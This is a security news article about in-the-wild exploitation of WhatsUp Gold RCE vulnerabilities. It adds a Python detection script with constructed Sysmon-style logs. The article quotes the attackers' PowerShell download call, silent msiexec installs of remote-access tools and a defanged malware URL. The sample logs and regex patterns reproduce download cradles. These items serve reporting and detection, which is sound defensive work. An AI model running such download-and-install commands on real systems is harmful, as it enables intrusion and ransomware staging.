WhatsUp Gold is a comprehensive IT infrastructure monitoring tool designed to provide visibility into the performance and status of applications, network devices, and servers across both cloud and on-premises environments.
Recently, cybersecurity researchers at Trend Micro discovered that attackers have been actively exploiting a Progress WhatsUp Gold remote code execution (RCE) vulnerability in the wild.
Progress WhatsUp RCE Vulnerability
The attacks have been observed since August 30, 2024, and exploit the vulnerabilities “CVE-2024-6670” and “CVE-2024-6671.”
Both vulnerabilities are rated “Critical” with a CVSS score of 9.8.
The vulnerabilities, disclosed on August 16, allow an unauthenticated attacker to retrieve the encrypted password via SQL injection when the application is configured with a single user.
Attackers abused the legitimate Active Monitor PowerShell Script function within the NmPoller.exe process to execute malicious code.
The attack pattern bypassed typical initial access indicators, suggesting direct vulnerability exploitation.
The PowerShell payload acted as a downloader, fetching additional malware with calls such as “(New-Object System.Net.WebClient).DownloadFile().”
According to the Trend Micro report, the attackers then attempted to install remote administration tools (RATs) such as Atera Agent, Radmin RAT, SimpleHelp Remote Access, and Splashtop Remote using msiexec.exe.
Some of the RAT installers were downloaded from sites like hxxps://fedko[.]org/wp-includes/ID3/setup.msi.
These operations were monitored by the MXDR team with assistance from Trend Vision One activity monitoring.
Although the threat actor has not yet been identified, the deployment of several RATs points to preparation for a ransomware attack.
Progress released a security patch for WhatsUp Gold on August 16, 2024, which included fixes for CVE-2024-4885 and CVE-2024-6670.
Two weeks later, on August 30, a proof-of-concept (PoC) exploit was published on GitHub; within hours, the Trend Micro MXDR team observed the first exploitation activity against the vulnerability.
The attack took advantage of NmPoller.exe’s built-in ability to run PowerShell code without launching powershell.exe itself, which can evade security controls that key on the PowerShell process.
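As an added example that is not part of the article or the Trend Micro report, the following Python script turns the behaviours described above into three detection rules and runs them over constructed Sysmon-style log lines: NmPoller.exe spawning an installer or other living-off-the-land binary, NmPoller.exe loading System.Management.Automation.dll (the in-process PowerShell host that leaves no powershell.exe process behind), and a WebClient download cradle in a PowerShell script block (Event ID 4104). The install path, the example.invalid URL, and the flattened key=value log layout are assumptions made for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry (not from the Trend Micro investigation), written as
# flattened key=value lines in the style of Sysmon Event ID 1 (process create),
# Sysmon Event ID 7 (image load) and PowerShell Event ID 4104 (script block logging).
SAMPLE_EVENTS = [
    r"EventID=1 Image=C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe ParentImage=C:\Windows\System32\services.exe CommandLine=NmPoller.exe",
    r"EventID=7 Image=C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe ImageLoaded=C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll",
    r"EventID=4104 ScriptBlockText=(New-Object System.Net.WebClient).DownloadFile('https://example.invalid/setup.msi', 'C:\Windows\Temp\setup.msi')",
    r"EventID=1 Image=C:\Windows\System32\msiexec.exe ParentImage=C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe CommandLine=msiexec.exe /i C:\Windows\Temp\setup.msi /qn",
    r"EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine=powershell.exe -File C:\scripts\backup.ps1",
    r"EventID=4104 ScriptBlockText=Get-Service | Where-Object Status -eq Running",
]

POLLER = "nmpoller.exe"
# Children the poller has no business spawning while it runs Active Monitor scripts.
SUSPICIOUS_CHILDREN = {
    "msiexec.exe", "cmd.exe", "powershell.exe", "rundll32.exe",
    "regsvr32.exe", "mshta.exe", "certutil.exe",
}
# Classic PowerShell download cradles followed by a remote URL.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(System\.Net\.WebClient|DownloadFile|DownloadString|"
    r"Invoke-WebRequest|Start-BitsTransfer).*https?://"
)
# Split a flattened line at the whitespace that precedes the next Key= token, so
# values containing spaces (e.g. "Program Files (x86)") stay intact.
FIELD_SPLIT = re.compile(r"\s+(?=[A-Za-z]+=)")


def parse_event(line: str) -> dict:
    """Parse one flattened key=value log line into a dict."""
    event = {}
    for field in FIELD_SPLIT.split(line.strip()):
        key, _, value = field.partition("=")
        event[key] = value.strip('"')
    return event


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> list:
    """Return (rule, detail) findings for a single parsed event."""
    findings = []
    eid = event.get("EventID")
    image = basename(event.get("Image", ""))
    if eid == "1":
        parent = basename(event.get("ParentImage", ""))
        if parent == POLLER and image in SUSPICIOUS_CHILDREN:
            findings.append(("poller_child_process",
                             f"NmPoller.exe spawned {image}: {event.get('CommandLine', '')}"))
    elif eid == "7":
        if image == POLLER and basename(event.get("ImageLoaded", "")) == "system.management.automation.dll":
            findings.append(("inproc_powershell",
                             "NmPoller.exe loaded System.Management.Automation.dll "
                             "(PowerShell hosted in-process, no powershell.exe)"))
    elif eid == "4104":
        text = event.get("ScriptBlockText", "")
        if DOWNLOAD_CRADLE.search(text):
            findings.append(("download_cradle", f"script block downloads from the network: {text}"))
    return findings


def hunt(lines) -> list:
    """Run every rule over every log line and collect the findings in order."""
    return [finding for line in lines for finding in evaluate(parse_event(line))]


if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Note that the `inproc_powershell` rule fires on legitimate use too: every Active Monitor PowerShell script run by NmPoller.exe loads the same assembly, so on its own it is context rather than an alert. The signal worth paging on is the correlation, the DLL load followed by a download cradle in script block logging and by NmPoller.exe spawning msiexec.exe, which is the sequence the report describes.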
Over 1,207 devices have been reported as exposed to CVE-2024-4885, which carries a critical CVSS score of 9.8.
To limit this risk, organizations should apply patches as soon as they are released, especially for critical vulnerabilities, rather than waiting for a public PoC to appear.
Mitigations
The recommended mitigations are:-
- Restrict access to corporate services with access controls.
- Enable MFA for network logins.
- Use passkeys.
- Apply patches promptly.
- Secure management consoles/APIs.
- Use strong passwords.